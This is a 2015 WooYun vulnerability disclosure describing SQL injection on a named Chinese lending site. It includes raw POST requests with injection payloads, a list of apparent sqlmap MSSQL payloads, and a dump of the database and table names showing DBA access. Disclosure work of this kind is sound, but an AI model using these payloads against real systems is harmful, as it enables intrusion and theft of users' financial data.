808信贷主站SQL注射泄露大量数据 | wooyun-2015-0110793| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110793

漏洞标题：808信贷主站SQL注射泄露大量数据

漏洞作者：路人甲

提交时间：2015-04-28 10:14

修复时间：2015-06-12 10:16

公开时间：2015-06-12 10:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-28：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-06-12：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

233

详细说明：

参考：http://wooyun.org/bugs/wooyun-2015-0110567
1，
POST /handle/getHelpContent.ashx HTTP/1.1
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.js808.cn/
Cookie: ASP.NET_SessionId=04bquo552xqo1e55vb1onh45; CheckCode=2822
Host: www.js808.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
id=20%20AND%203*2*1%3d6%20AND%20244%3d244
2
POST /newSite/Other/User_unlock.aspx HTTP/1.1
Content-Length: 1694
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=04bquo552xqo1e55vb1onh45; CheckCode=2822
Host: www.js808.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
btnEmail=%e7%a1%ae%e8%ae%a4%e6%8f%90%e4%ba%a4&ddlTypeOne=email&ddlTypeTwo=email&txtCode=94102&txtLockNickname='%2b(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(79)%2bCHAR(117)%2bCHAR(105)%2bCHAR(105)%2bCHAR(105)%2bCHAR(82)%2bCHAR(114)%2bCHAR(110))%20FROM%20syscolumns)%2b'&txtonestr=1&txttwostr=1&__VIEWSTATE=/wEPDwUINDA3OTc4NTYPZBYCAgEPZBYEAgEPZBYCAgEPDxYCHgRUZXh0Bc4BIOasoui/juadpeWIsDgwOOe9kee7nOS/oei0t%2bW5s%2bWPsOOAgiZuYnNwOyZuYnNwO1s8YSBocmVmPSdodHRwOi8vd3d3LmpzODA4LmNuL25ld1NpdGUvT3RoZXIvbG9naW5fbmV3LmFzcHgnPueZu%2bW9lTwvYT5dJm5ic3A7WzxhIGhyZWY9J2h0dHA6Ly93d3cuanM4MDguY24vbmV3U2l0ZS9PdGhlci9yZWdpc3Rlcl9OZXcuYXNweCc%2b5YWN6LS55rOo5YaMPC9hPl1kZAITD2QWAgIBDxYCHglpbm5lcmh0bWwFzAU8bGk%2bPGEgaHJlZj0nIyc%2bPGltZyBib3JkZXI9JzAnIHNyYz0nL2ltYWdlcy9idXR0b25fb2xkXzQwLmdpZicgYWx0PSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nIHRpdGxlPSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nPiZuYnNwOzEzODI3MTgwODwvYT4mbmJzcDsmbmJzcDs4MDjpmL/kuL08L2xpPjxsaT48YSBocmVmPScjJz48aW1nIGJvcmRlcj0nMCcgc3JjPScvaW1hZ2VzL2J1dHRvbl9vbGRfNDAuZ2lmJyBhbHQ9J%2beCueWHu%2bi/memHjOe7meaIkeWPkea2iOaBrycgdGl0bGU9J%2beCueWHu%2bi/memHjOe7meaIkeWPkea2iOaBryc%2bJm5ic3A7MTMzODcxODA4PC9hPiZuYnNwOyZuYnNwOzgwOOmYv%2bmbhTwvbGk%2bPGxpPjxhIGhyZWY9JyMnPjxpbWcgYm9yZGVyPScwJyBzcmM9Jy9pbWFnZXMvYnV0dG9uX29sZF80MC5naWYnIGFsdD0n54K55Ye76L%2bZ6YeM57uZ5oiR5Y%2bR5raI5oGvJyB0aXRsZT0n54K55Ye76L%2bZ6YeM57uZ5oiR5Y%2bR5raI5oGvJz4mbmJzcDsxMzgwNzU4MDg8L2E%2bJm5ic3A7Jm5ic3A7ODA46Zi/6ZyePC9saT48bGk%2bPGEgaHJlZj0nIyc%2bPGltZyBib3JkZXI9JzAnIHNyYz0nL2ltYWdlcy9idXR0b25fb2xkXzQwLmdpZicgYWx0PSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nIHRpdGxlPSfngrnlh7vov5nph4znu5nmiJHlj5Hmtojmga8nPiZuYnNwOzEzMDk3MTgwODwvYT4mbmJzcDsmbmJzcDs4MDjpmL/oirM8L2xpPmRk

漏洞证明：

---
Parameter: id (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
    Payload: id=(SELECT (CASE WHEN (2692=2692) THEN 2692 ELSE 2692*(SELECT 2692 FROM master..sysdatabases) END))
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 4707=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4707=4707) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3982=3982) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113))
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=1;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(78)+CHAR(86)+CHAR(79)+CHAR(102)+CHAR(65)+CHAR(89)+CHAR(115)+CHAR(122)+CHAR(108)+CHAR(97)+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113),NULL,NULL-- 
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user is DBA:    True
available databases [6]:
[*] 808_mdbs
[*] master
[*] model
[*] msdb
[*] temp808
[*] tempdb
Database: 808_mdbs
[229 tables]
+----------------------+
| Admin_Sign           |
| Admin_User_808       |
| Admin_iplists        |
| Android_LoginUser    |
| Answer_808           |
| BBS_father           |
| BBS_repays           |
| BBS_son              |
| BBS_tie              |
| Bank_infor           |
| Block_kf             |
| CftWith              |
| City_8088            |
| City_8088            |
| CreditEdu            |
| CreditLevel          |
| CreditSorce_808      |
| CustomerAssess       |
| CustomerService      |
| DataCensus_TzQj      |
| EduApplay_808        |
| Edu_Tb_808           |
| EmailValide          |
| Freezingzj           |
| Friend_hei           |
| Friends_808          |
| FundsInfos           |
| Funds_balance        |
| GiftsDhlist          |
| HelpCenterNews       |
| HelpClass            |
| Invitefriends        |
| IpInfors             |
| JkEText              |
| Jl_tj                |
| Job_Tb_808           |
| LimitSendEmail       |
| LimitSendEmail       |
| Link_Tb_808          |
| LoanInfos_operate    |
| LoanInfos_operate    |
| LoanQsmd             |
| Loan_Review          |
| Loaninfos_userinfos  |
| LockUsers            |
| Lotter_state         |
| MailContents         |
| Monitor_Tb           |
| OthersiteLoan        |
| PastApplay           |
| PastEdu              |
| Pro_dhPack           |
| Product_ScoreDh      |
| Product_duInfos      |
| Qustion_808          |
| ReceiveLoan          |
| Reg_Arrt             |
| Repaymentloan        |
| SendCollection       |
| SiteInfor            |
| SiteMail             |
| SiteUser_dstj        |
| SubmitRepayment      |
| SystemFather         |
| SystemSon            |
| TB_Dyzliao           |
| TB_Kdbaoedu          |
| TB_Txjietu           |
| TB_adm_ywlr          |
| TB_secpwd            |
| Table_kbao           |
| Tb_Managelist        |
| Tb_Notice            |
| Tb_Suggest           |
| Tb_dfusers           |
| Tb_otherhmd          |
| TempSecid            |
| TenderInfos          |
| Tender_db            |
| TestMess1            |
| TestMess1            |
| Tgnc_table           |
| TrackKf              |
| Upload_System        |
| UserEmailActivate    |
| UserLogin_error      |
| UserRegister_Actions |
| UserSafety           |
| UserScoreDetails     |
| UserScore_DhTx       |
| UserScore_DhTx       |
| UserSendMailInfo     |
| UserTbMoneyTj        |
| User_Lottery         |
| User_TruntableReward |
| User_UnLockInfos     |
| User_WriteOff        |
| User_aqNotice        |
| User_loanIntr        |
| Users_upload         |
| VW_Yqhmd2            |
| VW_Yqhmd2            |
| VW_ZliaoP            |
| VW_dbr               |
| VW_suggest           |
| Vip_Users_808        |
| Vw_Bbsties           |
| Vw_Cftwith           |
| Vw_Fkrsjsq           |
| Vw_Freezes           |
| Vw_Friends           |
| Vw_Fundsinfors       |
| Vw_IpList            |
| Vw_L_Review          |
| Vw_Lendmx            |
| Vw_LoanInfoShenHe    |
| Vw_Loaninformations  |
| Vw_LotterState       |
| Vw_MailContent       |
| Vw_ManageUsers       |
| Vw_Monitor           |
| Vw_PeduApplay        |
| Vw_ProPackInfosList  |
| Vw_ProPackList       |
| Vw_ProductDhInfo     |
| Vw_ProductList       |
| Vw_Receives          |
| Vw_Remind_users      |
| Vw_Repayment         |
| Vw_SiteEmails        |
| Vw_Tgusers           |
| Vw_TieComment        |
| Vw_Trender           |
| Vw_UserLotter        |
| Vw_UserWithDrawList  |
| Vw_Valide            |
| Vw_VipInfos          |
| Vw_admiplist         |
| Vw_bbsBlock          |
| Vw_belowCz           |
| Vw_cs_users          |
| Vw_dbeduapplay       |
| Vw_edhistory         |
| Vw_eduapplay         |
| Vw_eduapplay         |
| Vw_hk2days           |
| Vw_hlists            |
| Vw_inforsnews        |
| Vw_lockuserLists     |
| Vw_remindlist        |
| Vw_shzt              |
| Vw_tgtc              |
| Vw_txusers           |
| Vw_user_zc           |
| Vw_userje            |
| Vw_users             |
| Vw_webinfor          |
| Vw_withdraws         |
| Vw_wztjian_Tb        |
| Vw_xcyw              |
| Vw_yq_users          |
| Vw_yqusers           |
| WithDraw_list        |
| admin_tb_808         |
| applyloan            |
| bank_setqx           |
| bbstie_comment       |
| begsh_tb             |
| below_recharge       |
| bjin_vip_vw          |
| bjin_vip_vw          |
| black                |
| comd_list            |
| cspimg_808           |
| db_ed_808            |
| db_jktb_808          |
| dbeduapplay          |
| dbr_tb               |
| dya_table            |
| ed_history           |
| fkrsjrz              |
| fksmrz_tb            |
| giftslist            |
| gzr_list             |
| hid_id_tb            |
| jkcls_808            |
| kserver_Tb808        |
| onlineorder          |
| pinsorce_808         |
| pro_packinfos        |
| provinces_808        |
| pshhe_result         |
| second_tb            |
| self_table           |
| spplun_intrs         |
| sysdiagrams          |
| temp_allscore        |
| temp_allscore        |
| test_808             |
| tgtc_tb808           |
| userinfos_808        |
| vw_Bbsreplays        |
| vw_Tenderdbmx        |
| vw_Tenderdbmx        |
| vw_answers           |
| vw_bankinfo          |
| vw_bankqxuser        |
| vw_csusers           |
| vw_dbjklist          |
| vw_diya              |
| vw_edus              |
| vw_etextlist         |
| vw_fksmrz            |
| vw_hei_friend        |
| vw_jkcns             |
| vw_jksmrz            |
| vw_jobs              |
| vw_onorders          |
| vw_question          |
| vw_selftb            |
| vw_txhk2tian         |
| vw_txremind          |
| vw_upphotos          |
| vw_userwriteoff      |
| vw_wbnotices         |
| vw_yqlist            |
| wztjian_Tb           |
| xc_repaymment        |
| xc_tjr               |
+----------------------+

修复方案：

~~~

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0110793

漏洞标题：808信贷主站SQL注射泄露大量数据

相关厂商：808信贷

漏洞作者： 路人甲

提交时间：2015-04-28 10:14

修复时间：2015-06-12 10:16

公开时间：2015-06-12 10:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0110793"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云